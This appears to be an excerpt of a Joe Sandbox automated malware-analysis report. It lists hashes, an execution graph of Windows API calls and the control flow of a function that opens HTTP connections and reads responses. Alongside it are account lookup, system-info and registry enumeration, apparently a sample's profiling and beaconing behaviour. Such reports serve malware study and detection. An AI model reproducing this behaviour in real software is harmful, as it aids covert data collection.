                        • Snapshot File: hcaresult_0_2_5130000_EXyAlLKIck.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b862a9285f03f362425e41b53334235b664bc1a603b5bbde3c0b1eef1c828ae
                        • Instruction ID: 9fe6e1a9a7f36c9fdd5f6ad13377e5fdf634312472dc935effaea2e3830a4f90
                        • Opcode Fuzzy Hash: 1b862a9285f03f362425e41b53334235b664bc1a603b5bbde3c0b1eef1c828ae
                        • Instruction Fuzzy Hash: 05F08B51908302AEC76695B0C9ED1A53FD27E4F031B354FE5E5B38A1A2F75281076282
                        Function 05130C4A Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2057173700.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5130000_EXyAlLKIck.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 43dec04e273fa09005cbacab6963184bc5b414c7447806fffb1963323ee8bad4
                        • Instruction ID: 0edf73ea7fcb48f8a16c0eaf2d89b14b7578c69825f729a8fe33ecfb9acded60
                        • Opcode Fuzzy Hash: 43dec04e273fa09005cbacab6963184bc5b414c7447806fffb1963323ee8bad4
                        • Instruction Fuzzy Hash: B6F09750608302AFC35695B0C9EC1A63EE2BE8B031B318EF4A893C6162F7508107A692

                        Execution Graph

                        Execution Coverage:7.2%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:7.3%
                        Total number of Nodes:606
                        Total number of Limit Nodes:41
                        execution_graph 13073 6dd6ef 13076 6dd6fc __fassign 13073->13076 13074 6dd727 RtlAllocateHeap 13075 6dd73a __dosmaperr 13074->13075 13074->13076 13076->13074 13076->13075 13783 6bb7e9 13784 6bb6e5 11 API calls 13783->13784 13785 6bb811 Concurrency::details::_Reschedule_chore 13784->13785 13786 6bb836 13785->13786 13790 6bcade 13785->13790 13788 6bb648 11 API calls 13786->13788 13789 6bb84e 13788->13789 13791 6bcafc 13790->13791 13792 6bcaec TpCallbackUnloadDllOnCompletion 13790->13792 13791->13786 13792->13791 13077 6d6beb 13078 6d6bf7 13077->13078 13089 6d8aaf 13078->13089 13080 6d6c26 13081 6d6c35 13080->13081 13082 6d6c43 13080->13082 13083 6d6c99 9 API calls 13081->13083 13097 6d68bd 13082->13097 13085 6d6c3f 13083->13085 13086 6d6c5d 13088 6d6c71 ___free_lconv_mon 13086->13088 13100 6d6c99 13086->13100 13090 6d8ab4 __fassign 13089->13090 13093 6d8abf 13090->13093 13112 6dd4f4 13090->13112 13109 6d651d 13093->13109 13094 6dd727 RtlAllocateHeap 13095 6dd73a __dosmaperr 13094->13095 13096 6d8af2 __fassign 13094->13096 13095->13080 13096->13094 13096->13095 13131 6d683a 13097->13131 13099 6d68cf 13099->13086 13101 6d6cc4 __cftof 13100->13101 13107 6d6ca7 __cftof __dosmaperr 13100->13107 13102 6d6d06 CreateFileW 13101->13102 13108 6d6cea __cftof __dosmaperr 13101->13108 13103 6d6d38 13102->13103 13104 6d6d2a 13102->13104 13181 6d6d77 13103->13181 13167 6d6e01 GetFileType 13104->13167 13107->13088 13108->13088 13119 6d63f7 13109->13119 13113 6dd500 __fassign 13112->13113 13114 6d651d __fassign 2 API calls 13113->13114 13115 6dd55c __cftof __dosmaperr __fassign 13113->13115 13118 6dd6ee __fassign 13114->13118 13115->13093 13116 6dd727 RtlAllocateHeap 13117 6dd73a __dosmaperr 13116->13117 13116->13118 13117->13093 13118->13116 13118->13117 13121 6d6405 __fassign 13119->13121 13120 6d6450 13120->13096 13121->13120 13124 6d645b 13121->13124 13129 6da1c2 GetPEB 13124->13129 13126 6d6465 13127 6d646a GetPEB 13126->13127 13128 6d647a __fassign 13126->13128 13127->13128 13130 6da1dc __fassign 13129->13130 13130->13126 13132 6d6851 13131->13132 13133 6d685a 13131->13133 13132->13099 13133->13132 13137 6db4bb 13133->13137 13138 6db4ce 13137->13138 13139 6d6890 13137->13139 13138->13139 13145 6df46b 13138->13145 13141 6db4e8 13139->13141 13142 6db4fb 13141->13142 13143 6db510 13141->13143 13142->13143 13150 6de571 13142->13150 13143->13132 13147 6df477 __fassign 13145->13147 13146 6df4c6 13146->13139 13147->13146 13148 6d8aaf __fassign 4 API calls 13147->13148 13149 6df4eb 13148->13149 13151 6de57b 13150->13151 13154 6de489 13151->13154 13153 6de581 13153->13143 13158 6de495 __fassign ___free_lconv_mon 13154->13158 13155 6de4b6 13155->13153 13156 6d8aaf __fassign 4 API calls 13157 6de528 13156->13157 13159 6de564 13157->13159 13163 6da5ee 13157->13163 13158->13155 13158->13156 13159->13153 13164 6da611 13163->13164 13165 6d8aaf __fassign 4 API calls 13164->13165 13166 6da687 13165->13166 13168 6d6e3c 13167->13168 13180 6d6ed2 __dosmaperr 13167->13180 13170 6d6e56 __cftof 13168->13170 13203 6d7177 13168->13203 13171 6d6e75 GetFileInformationByHandle 13170->13171 13170->13180 13172 6d6e8b 13171->13172 13171->13180 13189 6d70c9 13172->13189 13176 6d6ea8 13177 6d6f71 SystemTimeToTzSpecificLocalTime 13176->13177 13178 6d6ebb 13177->13178 13179 6d6f71 SystemTimeToTzSpecificLocalTime 13178->13179 13179->13180 13180->13108 13226 6d7314 13181->13226 13183 6d6d85 13184 6d6d8a __dosmaperr 13183->13184 13185 6d70c9 4 API calls 13183->13185 13184->13108 13186 6d6da3 13185->13186 13187 6d7177 RtlAllocateHeap 13186->13187 13188 6d6dc2 13187->13188 13188->13108 13191 6d70df _wcsrchr 13189->13191 13190 6d6e97 13199 6d6f71 13190->13199 13191->13190 13207 6db9e4 13191->13207 13193 6d7123 13193->13190 13194 6db9e4 4 API calls 13193->13194 13195 6d7134 13194->13195 13195->13190 13196 6db9e4 4 API calls 13195->13196 13197 6d7145 13196->13197 13197->13190 13198 6db9e4 4 API calls 13197->13198 13198->13190 13200 6d6f89 13199->13200 13201 6d6fa9 SystemTimeToTzSpecificLocalTime 13200->13201 13202 6d6f8f 13200->13202 13201->13202 13202->13176 13204 6d7190 13203->13204 13206 6d71a4 __dosmaperr 13204->13206 13218 6db568 13204->13218 13206->13170 13208 6db9f2 13207->13208 13209 6db9f8 __cftof __dosmaperr 13208->13209 13212 6dba2d 13208->13212 13209->13193 13211 6dba28 13211->13193 13213 6dba57 13212->13213 13216 6dba3d __cftof __dosmaperr 13212->13216 13214 6d683a __fassign 4 API calls 13213->13214 13213->13216 13217 6dba81 13214->13217 13215 6db9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13215->13217 13216->13211 13217->13215 13217->13216 13219 6db592 __cftof 13218->13219 13220 6db5ae __dosmaperr ___free_lconv_mon 13219->13220 13222 6dd6ef 13219->13222 13220->13206 13225 6dd6fc __fassign 13222->13225 13223 6dd727 RtlAllocateHeap 13224 6dd73a __dosmaperr 13223->13224 13223->13225 13224->13220 13225->13223 13225->13224 13227 6d7338 13226->13227 13229 6d733e 13227->13229 13230 6d7036 13227->13230 13229->13183 13231 6d7042 __dosmaperr 13230->13231 13236 6db87b 13231->13236 13233 6d705a __dosmaperr 13234 6db87b RtlAllocateHeap 13233->13234 13235 6d7068 13233->13235 13234->13235 13235->13229 13239 6db6de 13236->13239 13238 6db894 13238->13233 13240 6db6ee 13239->13240 13242 6db6f5 13240->13242 13243 6e1ef8 13240->13243 13242->13238 13246 6e1d22 13243->13246 13245 6e1f0f 13245->13242 13247 6e1d54 13246->13247 13249 6e1d40 __cftof __dosmaperr 13246->13249 13248 6db568 RtlAllocateHeap 13247->13248 13247->13249 13248->13249 13249->13245 13446 6a7400 13448 6a7435 shared_ptr 13446->13448 13447 6a752f shared_ptr 13448->13447 13452 6bd041 13448->13452 13450 6a75bd 13450->13447 13456 6bcff7 13450->13456 13454 6bd052 13452->13454 13453 6bd05a 13453->13450 13454->13453 13460 6bd0c9 13454->13460 13458 6bd006 13456->13458 13457 6bd0af 13457->13447 13458->13457 13459 6bd0ab RtlWakeAllConditionVariable 13458->13459 13459->13447 13461 6bd0d7 SleepConditionVariableCS 13460->13461 13463 6bd0f0 13460->13463 13461->13463 13463->13454 13474 6b6ae0 13475 6b6b10 13474->13475 13478 6b46c0 13475->13478 13477 6b6b5c Sleep 13477->13475 13481 6b46fb 13478->13481 13494 6b4d80 shared_ptr 13478->13494 13479 6b4e69 shared_ptr 13479->13477 13482 6abd60 5 API calls 13481->13482 13481->13494 13493 6b4753 shared_ptr __dosmaperr 13482->13493 13483 6b4f25 shared_ptr 13484 6b4fee shared_ptr 13483->13484 13488 6b6ab6 13483->13488 13516 6a7d00 13484->13516 13486 6b4ffd 13522 6a82b0 13486->13522 13490 6b46c0 19 API calls 13488->13490 13489 6b4a0d 13491 6abd60 5 API calls 13489->13491 13489->13494 13492 6b6b5c Sleep 13490->13492 13496 6b4a72 shared_ptr 13491->13496 13492->13488 13493->13489 13495 6d8979 4 API calls 13493->13495 13494->13479 13506 6a65b0 13494->13506 13495->13489 13496->13494 13499 6b42a0 13496->13499 13498 6b5016 shared_ptr 13498->13477 13500 6b42e2 13499->13500 13501 6b4556 13500->13501 13504 6b4308 shared_ptr 13500->13504 13503 6b3550 16 API calls 13501->13503 13502 6b4520 shared_ptr 13502->13494 13503->13502 13504->13502 13526 6b3550 13504->13526 13515 52e0d36 13506->13515 13507 6a660f LookupAccountNameA 13508 6a6662 13507->13508 13509 6a2280 4 API calls 13508->13509 13510 6a6699 shared_ptr 13509->13510 13511 6a2280 4 API calls 13510->13511 13512 6a6822 shared_ptr 13510->13512 13513 6a6727 shared_ptr 13511->13513 13512->13483 13513->13512 13514 6a2280 4 API calls 13513->13514 13514->13513 13515->13507 13518 6a7d66 shared_ptr __cftof 13516->13518 13517 6a7ea3 GetNativeSystemInfo 13519 6a7ea7 13517->13519 13518->13517 13518->13519 13521 6a7eb8 shared_ptr 13518->13521 13519->13521 13610 6d8a81 13519->13610 13521->13486 13523 6a8315 shared_ptr __cftof 13522->13523 13524 6a8333 13523->13524 13525 6a8454 GetNativeSystemInfo 13523->13525 13524->13498 13525->13524 13527 6b3b92 shared_ptr std::_Xinvalid_argument 13526->13527 13528 6b358f shared_ptr 13526->13528 13527->13504 13528->13527 13532 6b38f5 shared_ptr __dosmaperr 13528->13532 13539 6aaca0 13528->13539 13529 6d8979 4 API calls 13531 6b3a8a 13529->13531 13531->13527 13533 6b3e52 13531->13533 13535 6b3b9d 13531->13535 13537 6b3ab2 13531->13537 13532->13527 13532->13529 13565 6b2e20 13533->13565 13548 6b1dd0 13535->13548 13544 6b07f0 13537->13544 13541 6aadf0 __cftof 13539->13541 13540 6aae16 shared_ptr 13540->13532 13541->13540 13583 6a5500 13541->13583 13543 6aaf7e 13545 6b0870 __dosmaperr 13544->13545 13546 6d8979 4 API calls 13545->13546 13547 6b0a6d 13546->13547 13551 6b1e6b shared_ptr __dosmaperr 13548->13551 13549 6ae440 6 API calls 13550 6b2936 shared_ptr std::_Xinvalid_argument 13549->13550 13550->13527 13551->13550 13552 6d8979 4 API calls 13551->13552 13560 6b1e78 13551->13560 13553 6b2265 shared_ptr 13552->13553 13553->13550 13554 6d6659 RtlAllocateHeap 13553->13554 13555 6b267a 13554->13555 13556 6d66e7 4 API calls 13555->13556 13555->13560 13557 6b268b shared_ptr __dosmaperr 13556->13557 13557->13550 13558 6d8979 4 API calls 13557->13558 13559 6b2759 13558->13559 13559->13550 13559->13560 13561 6b27d1 13559->13561 13560->13549 13562 6ae440 6 API calls 13561->13562 13563 6b2843 13562->13563 13563->13550 13564 6a5df0 2 API calls 13563->13564 13564->13550 13567 6b2ec5 shared_ptr __cftof 13565->13567 13571 6b2e64 13565->13571 13566 6ae440 6 API calls 13572 6b3423 shared_ptr 13566->13572 13568 6b32de InternetCloseHandle InternetCloseHandle 13567->13568 13569 6b32f2 InternetCloseHandle InternetCloseHandle 13567->13569 13567->13571 13567->13572 13568->13567 13569->13567 13570 6b351a shared_ptr std::_Xinvalid_argument 13570->13527 13571->13566 13572->13570 13574 6aaca0 4 API calls 13572->13574 13578 6b38f5 shared_ptr __dosmaperr 13572->13578 13573 6d8979 4 API calls 13575 6b3a8a 13573->13575 13574->13578 13575->13570 13576 6b3b9d 13575->13576 13577 6b3e52 13575->13577 13581 6b3ab2 13575->13581 13580 6b1dd0 12 API calls 13576->13580 13579 6b2e20 12 API calls 13577->13579 13578->13570 13578->13573 13579->13570 13580->13570 13582 6b07f0 4 API calls 13581->13582 13582->13570 13584 6a5520 13583->13584 13586 6a5620 13584->13586 13587 6a2280 13584->13587 13586->13543 13590 6a2240 13587->13590 13591 6a2256 13590->13591 13594 6d8667 13591->13594 13597 6d7456 13594->13597 13596 6a2264 13596->13584 13598 6d7496 13597->13598 13602 6d747e __cftof __dosmaperr 13597->13602 13599 6d683a __fassign 4 API calls 13598->13599 13598->13602 13600 6d74ae 13599->13600 13603 6d7a11 13600->13603 13602->13596 13605 6d7a22 13603->13605 13604 6d7a31 __cftof __dosmaperr 13604->13602 13605->13604 13606 6d7d83 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13605->13606 13607 6d7fb5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13605->13607 13608 6d7c0f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13605->13608 13609 6d7c35 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13605->13609 13606->13605 13607->13605 13608->13605 13609->13605 13611 6d86d7 4 API calls 13610->13611 13612 6d8a9f 13611->13612 13612->13521 13625 6ba140 13626 6ba1c0 13625->13626 13632 6b7040 13626->13632 13628 6ba1fc shared_ptr 13629 6ba3ee shared_ptr 13628->13629 13636 6a3ea0 13628->13636 13631 6ba3d6 13634 6b7081 __cftof __Mtx_init_in_situ 13632->13634 13633 6b72b6 13633->13628 13634->13633 13642 6a2e80 13634->13642 13637 6a3f08 13636->13637 13638 6a3ede 13636->13638 13639 6a3f18 13637->13639 13685 6a2bc0 13637->13685 13638->13631 13639->13631 13643 6a2ec6 13642->13643 13647 6a2f2f 13642->13647 13644 6bc5dc GetSystemTimePreciseAsFileTime 13643->13644 13645 6a2ed2 13644->13645 13648 6a2fde 13645->13648 13651 6a2edd __Mtx_unlock 13645->13651 13646 6a2faf 13646->13633 13647->13646 13653 6bc5dc GetSystemTimePreciseAsFileTime 13647->13653 13649 6bc19a 10 API calls 13648->13649 13650 6a2fe4 13649->13650 13652 6bc19a 10 API calls 13650->13652 13651->13647 13651->13650 13654 6a2f79 13652->13654 13653->13654 13655 6bc19a 10 API calls 13654->13655 13656 6a2f80 __Mtx_unlock 13654->13656 13655->13656 13657 6bc19a 10 API calls 13656->13657 13659 6a2f98 __Cnd_broadcast 13656->13659 13657->13659 13658 6bc19a 10 API calls 13660 6a2ffc 13658->13660 13659->13646 13659->13658 13661 6bc5dc GetSystemTimePreciseAsFileTime 13660->13661 13671 6a3040 shared_ptr __Mtx_unlock 13661->13671 13662 6a3185 13663 6bc19a 10 API calls 13662->13663 13664 6a318b 13663->13664 13665 6bc19a 10 API calls 13664->13665 13666 6a3191 13665->13666 13667 6bc19a 10 API calls 13666->13667 13673 6a3153 __Mtx_unlock 13667->13673 13668 6a3167 13668->13633 13669 6bc19a 10 API calls 13670 6a319d 13669->13670 13671->13662 13671->13664 13671->13668 13672 6bc5dc GetSystemTimePreciseAsFileTime 13671->13672 13674 6a311f 13672->13674 13673->13668 13673->13669 13674->13662 13674->13666 13674->13673 13676 6bbc7c 13674->13676 13679 6bbaa2 13676->13679 13678 6bbc8c 13678->13674 13680 6bbacc 13679->13680 13681 6bce9b _xtime_get GetSystemTimePreciseAsFileTime 13680->13681 13684 6bbad4 __Xtime_diff_to_millis2 13680->13684 13682 6bbaff __Xtime_diff_to_millis2 13681->13682 13683 6bce9b _xtime_get GetSystemTimePreciseAsFileTime 13682->13683 13682->13684 13683->13684 13684->13678 13686 6a2bce 13685->13686 13692 6bb777 13686->13692 13688 6a2c02 13689 6a2c09 13688->13689 13698 6a2c40 13688->13698 13689->13631 13691 6a2c18 std::_Xinvalid_argument 13693 6bb784 13692->13693 13697 6bb7a3 Concurrency::details::_Reschedule_chore 13692->13697 13701 6bcaa7 13693->13701 13695 6bb794 13695->13697 13703 6bb74e 13695->13703 13697->13688 13709 6bb72b 13698->13709 13700 6a2c72 shared_ptr 13700->13691 13702 6bcac2 CreateThreadpoolWork 13701->13702 13702->13695 13704 6bb757 Concurrency::details::_Reschedule_chore 13703->13704 13707 6bccfc 13704->13707 13706 6bb771 13706->13697 13708 6bcd11 TpPostWork 13707->13708 13708->13706 13710 6bb737 13709->13710 13712 6bb747 13709->13712 13710->13712 13713 6bc9a8 13710->13713 13712->13700 13714 6bc9bd TpReleaseWork 13713->13714 13714->13712 13718 6b8700 13719 6b875a __cftof 13718->13719 13725 6b9ae0 13719->13725 13721 6b8784 13724 6b879c 13721->13724 13729 6a43b0 13721->13729 13723 6b8809 std::_Throw_future_error 13726 6b9b15 13725->13726 13735 6a2ca0 13726->13735 13728 6b9b46 13728->13721 13730 6bbe0f InitOnceExecuteOnce 13729->13730 13731 6a43ca 13730->13731 13732 6a43d1 13731->13732 13733 6d6beb 9 API calls 13731->13733 13732->13723 13734 6a43e4 13733->13734 13736 6a2cdd 13735->13736 13737 6bbe0f InitOnceExecuteOnce 13736->13737 13738 6a2d06 13737->13738 13739 6a2d48 13738->13739 13740 6a2d11 13738->13740 13744 6bbe27 13738->13744 13751 6a2400 13739->13751 13740->13728 13745 6bbe33 std::_Xinvalid_argument 13744->13745 13746 6bbe9a 13745->13746 13747 6bbea3 13745->13747 13754 6bbdaf 13746->13754 13749 6a2aa0 10 API calls 13747->13749 13750 6bbe9f 13749->13750 13750->13739 13772 6bb506 13751->13772 13753 6a2432 13755 6bcb61 InitOnceExecuteOnce 13754->13755 13756 6bbdc7 13755->13756 13757 6bbdce 13756->13757 13760 6d6beb 13756->13760 13757->13750 13759 6bbdd7 13759->13750 13761 6d6bf7 13760->13761 13762 6d8aaf __fassign 4 API calls 13761->13762 13763 6d6c26 13762->13763 13764 6d6c35 13763->13764 13765 6d6c43 13763->13765 13766 6d6c99 9 API calls 13764->13766 13767 6d68bd 4 API calls 13765->13767 13768 6d6c3f 13766->13768 13769 6d6c5d 13767->13769 13768->13759 13770 6d6c99 9 API calls 13769->13770 13771 6d6c71 ___free_lconv_mon 13769->13771 13770->13771 13771->13759 13774 6bb521 std::_Xinvalid_argument 13772->13774 13773 6d8aaf __fassign 4 API calls 13775 6bb5cf 13773->13775 13774->13773 13776 6bb588 __fassign 13774->13776 13776->13753 13715 6d6559 13716 6d63f7 __fassign 2 API calls 13715->13716 13717 6d656a 13716->13717 13370 6bb85e 13375 6bb6e5 13370->13375 13372 6bb886 13383 6bb648 13372->13383 13374 6bb89f 13376 6bb6f1 Concurrency::details::_Reschedule_chore 13375->13376 13377 6bb722 13376->13377 13393 6bc5dc 13376->13393 13377->13372 13381 6bb70c __Mtx_unlock 13382 6a2ad0 10 API calls 13381->13382 13382->13377 13384 6bb654 Concurrency::details::_Reschedule_chore 13383->13384 13385 6bb6ae 13384->13385 13386 6bc5dc GetSystemTimePreciseAsFileTime 13384->13386 13385->13374 13387 6bb669 13386->13387 13388 6a2ad0 10 API calls 13387->13388 13389 6bb66f __Mtx_unlock 13388->13389 13390 6a2ad0 10 API calls 13389->13390 13391 6bb68c __Cnd_broadcast 13390->13391 13391->13385 13392 6a2ad0 10 API calls 13391->13392 13392->13385 13401 6bc382 13393->13401 13395 6bb706 13396 6a2ad0 13395->13396 13397 6a2ada 13396->13397 13398 6a2adc 13396->13398 13397->13381 13418 6bc19a 13398->13418 13402 6bc3aa 13401->13402 13403 6bc3d8 13401->13403 13402->13395 13403->13402 13407 6bce9b 13403->13407 13405 6bc42d __Xtime_diff_to_millis2 13405->13402 13406 6bce9b _xtime_get GetSystemTimePreciseAsFileTime 13405->13406 13406->13405 13408 6bceaa 13407->13408 13409 6bceb7 __aulldvrm 13407->13409 13408->13409 13411 6bce74 13408->13411 13409->13405 13414 6bcb1a 13411->13414 13415 6bcb2b GetSystemTimePreciseAsFileTime 13414->13415 13416 6bcb37 13414->13416 13415->13416 13416->13409 13419 6bc1c2 13418->13419 13420 6bc1a4 13418->13420 13419->13419 13420->13419 13422 6bc1c7 13420->13422 13425 6a2aa0 13422->13425 13424 6bc1de std::_Xinvalid_argument 13424->13420 13439 6bbe0f 13425->13439 13427 6a2abf 13427->13424 13428 6d8aaf __fassign 4 API calls 13430 6d6c26 13428->13430 13429 6a2ab4 13429->13427 13429->13428 13431 6d6c35 13430->13431 13432 6d6c43 13430->13432 13433 6d6c99 9 API calls 13431->13433 13434 6d68bd 4 API calls 13432->13434 13435 6d6c3f 13433->13435 13436 6d6c5d 13434->13436 13435->13424 13437 6d6c99 9 API calls 13436->13437 13438 6d6c71 ___free_lconv_mon 13436->13438 13437->13438 13438->13424 13442 6bcb61 13439->13442 13443 6bcb6f InitOnceExecuteOnce 13442->13443 13445 6bbe22 13442->13445 13443->13445 13445->13429 13620 6d6974 13621 6d698c 13620->13621 13622 6d6982 13620->13622 13623 6d68bd 4 API calls 13621->13623 13624 6d69a6 ___free_lconv_mon 13623->13624 13464 6ae410 13465 6ae419 13464->13465 13467 6ae435 13464->13467 13465->13467 13468 6ae270 13465->13468 13469 6ae280 __dosmaperr 13468->13469 13470 6d8979 4 API calls 13469->13470 13472 6ae2bd std::_Xinvalid_argument 13470->13472 13471 6ae435 13471->13465 13472->13471 13473 6ae270 4 API calls 13472->13473 13473->13472 13613 6a86b0 13614 6a86b6 13613->13614 13615 6d6659 RtlAllocateHeap 13614->13615 13616 6a86c3 13615->13616 13617 6a86d6 13616->13617 13618 6d66e7 4 API calls 13616->13618 13619 6a86d0 13618->13619 13794 6adfd0 recv 13795 6ae032 recv 13794->13795 13796 6ae067 recv 13795->13796 13798 6ae0a1 13796->13798 13797 6ae1c3 13798->13797 13799 6bc5dc GetSystemTimePreciseAsFileTime 13798->13799 13800 6ae1fe 13799->13800 13801 6bc19a 10 API calls 13800->13801 13802 6ae268 13801->13802 13250 6b1dd0 13253 6b1e6b shared_ptr __dosmaperr 13250->13253 13251 6ae440 6 API calls 13252 6b2936 shared_ptr std::_Xinvalid_argument 13251->13252 13253->13252 13262 6b1e78 13253->13262 13267 6d8979 13253->13267 13255 6b2265 shared_ptr 13255->13252 13271 6d6659 13255->13271 13259 6b268b shared_ptr __dosmaperr 13259->13252 13260 6d8979 4 API calls 13259->13260 13261 6b2759 13260->13261 13261->13252 13261->13262 13263 6b27d1 13261->13263 13262->13251 13278 6ae440 13263->13278 13265 6b2843 13265->13252 13293 6a5df0 13265->13293 13268 6d8994 13267->13268 13300 6d86d7 13268->13300 13270 6d899e 13270->13255 13324 6d65a2 13271->13324 13273 6b267a 13273->13262 13274 6d66e7 13273->13274 13275 6d66f3 13274->13275 13277 6d66fd __cftof __dosmaperr 13275->13277 13336 6d6670 13275->13336 13277->13259 13279 6ae489 13278->13279 13359 6abd60 13279->13359 13281 6ae9a9 shared_ptr 13281->13265 13282 6ae711 13282->13281 13283 6ae440 6 API calls 13282->13283 13285 6af696 13283->13285 13284 6af892 shared_ptr 13284->13265 13285->13284 13286 6ae440 6 API calls 13285->13286 13288 6af973 13286->13288 13287 6afa45 shared_ptr 13287->13265 13288->13287 13289 6d6659 RtlAllocateHeap 13288->13289 13290 6afbf1 13289->13290 13291 6ae440 6 API calls 13290->13291 13292 6b054c shared_ptr 13291->13292 13292->13265 13295 6a5e28 13293->13295 13294 6a5f0e shared_ptr 13294->13252 13295->13294 13296 6a6060 RegOpenKeyExA 13295->13296 13297 6a645a shared_ptr 13296->13297 13299 6a60b3 __cftof 13296->13299 13297->13252 13298 6a6153 RegEnumValueW 13298->13299 13299->13297 13299->13298 13301 6d86e9 13300->13301 13302 6d683a __fassign 4 API calls 13301->13302 13303 6d86fe __cftof __dosmaperr 13301->13303 13305 6d872e 13302->13305 13303->13270 13305->13303 13306 6d8925 13305->13306 13307 6d8962 13306->13307 13309 6d8932 13306->13309 13317 6dd2e9 13307->13317 13310 6d8941 __fassign 13309->13310 13312 6dd30d 13309->13312 13310->13305 13313 6d683a __fassign 4 API calls 13312->13313 13314 6dd32a 13313->13314 13316 6dd33a 13314->13316 13321 6df07f 13314->13321 13316->13310 13318 6dd2f4 13317->13318 13319 6db4bb __fassign 4 API calls 13318->13319 13320 6dd304 13319->13320 13320->13310 13322 6d683a __fassign 4 API calls 13321->13322 13323 6df09f __cftof __fassign __freea 13322->13323 13323->13316 13325 6d65ae 13324->13325 13327 6d65b5 __cftof __dosmaperr 13325->13327 13328 6da783 13325->13328 13327->13273 13329 6da78f 13328->13329 13332 6da827 13329->13332 13331 6da7aa 13331->13327 13334 6da84a 13332->13334 13333 6dd6ef RtlAllocateHeap 13335 6da890 ___free_lconv_mon 13333->13335 13334->13333 13334->13335 13335->13331 13337 6d6692 13336->13337 13339 6d667d __cftof __dosmaperr ___free_lconv_mon 13336->13339 13337->13339 13340 6d9ef9 13337->13340 13339->13277 13341 6d9f11 13340->13341 13343 6d9f36 13340->13343 13341->13343 13344 6e02f8 13341->13344 13343->13339 13345 6e0304 13344->13345 13347 6e030c __cftof __dosmaperr 13345->13347 13348 6e03ea 13345->13348 13347->13343 13349 6e040c 13348->13349 13351 6e0410 __cftof __dosmaperr 13348->13351 13349->13351 13352 6dfb7f 13349->13352 13351->13347 13353 6dfbcc 13352->13353 13354 6d683a __fassign 4 API calls 13353->13354 13357 6dfbdb __cftof 13354->13357 13355 6dd2e9 4 API calls 13355->13357 13356 6dfe7b 13356->13351 13357->13355 13357->13356 13358 6dc4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 13357->13358 13358->13357 13360 6abdb2 13359->13360 13362 6ac14e shared_ptr 13359->13362 13361 6abdc6 InternetOpenW InternetConnectA 13360->13361 13360->13362 13363 6abe3d 13361->13363 13362->13282 13364 6abe53 HttpOpenRequestA 13363->13364 13365 6abe71 shared_ptr 13364->13365 13366 6abf13 HttpSendRequestA 13365->13366 13367 6abf2b shared_ptr 13366->13367 13368 6abfb3 InternetReadFile 13367->13368 13369 6abfda 13368->13369 13777 6b9310 13778 6b9363 13777->13778 13779 6b9325 13777->13779 13780 6bd041 SleepConditionVariableCS 13779->13780 13781 6b932f 13780->13781 13781->13778 13782 6bcff7 RtlWakeAllConditionVariable 13781->13782 13782->13778

                        Executed Functions

                        Function 006ABD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 760 6abd60-6abdac 761 6abdb2-6abdb6 760->761 762 6ac1a1-6ac1c6 call 6b7f30 760->762 761->762 764 6abdbc-6abdc0 761->764 767 6ac1c8-6ac1d4 762->767 768 6ac1f4-6ac20c 762->768 764->762 766 6abdc6-6abe4f InternetOpenW InternetConnectA call 6b7870 call 6a5b20 764->766 795 6abe53-6abe6f HttpOpenRequestA 766->795 796 6abe51 766->796 770 6ac1ea-6ac1f1 call 6bd593 767->770 771 6ac1d6-6ac1e4 767->771 772 6ac158-6ac170 768->772 773 6ac212-6ac21e 768->773 770->768 771->770 775 6ac26f-6ac274 call 6d6b9a 771->775 779 6ac243-6ac25f call 6bcf21 772->779 780 6ac176-6ac182 772->780 777 6ac14e-6ac155 call 6bd593 773->777 778 6ac224-6ac232 773->778 777->772 778->775 785 6ac234 778->785 786 6ac188-6ac196 780->786 787 6ac239-6ac240 call 6bd593 780->787 785->777 786->775 794 6ac19c 786->794 787->779 794->787 797 6abea0-6abf0f call 6b7870 call 6a5b20 call 6b7870 call 6a5b20 795->797 798 6abe71-6abe80 795->798 796->795 812 6abf13-6abf29 HttpSendRequestA 797->812 813 6abf11 797->813 800 6abe82-6abe90 798->800 801 6abe96-6abe9d call 6bd593 798->801 800->801 801->797 814 6abf5a-6abf82 812->814 815 6abf2b-6abf3a 812->815 813->812 818 6abfb3-6abfd4 InternetReadFile 814->818 819 6abf84-6abf93 814->819 816 6abf3c-6abf4a 815->816 817 6abf50-6abf57 call 6bd593 815->817 816->817 817->814 823 6abfda 818->823 821 6abfa9-6abfb0 call 6bd593 819->821 822 6abf95-6abfa3 819->822 821->818 822->821 826 6abfe0-6ac090 call 6d4180 823->826
                        APIs
                        • InternetOpenW.WININET(006F8D70,00000000,00000000,00000000,00000000), ref: 006ABDED
                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 006ABE11
                        • HttpOpenRequestA.WININET(?,00000000), ref: 006ABE5B
                        • HttpSendRequestA.WININET(?,00000000), ref: 006ABF1B
                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 006ABFCD
                        • InternetCloseHandle.WININET(?), ref: 006AC0A7
                        • InternetCloseHandle.WININET(?), ref: 006AC0AF
                        • InternetCloseHandle.WININET(?), ref: 006AC0B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
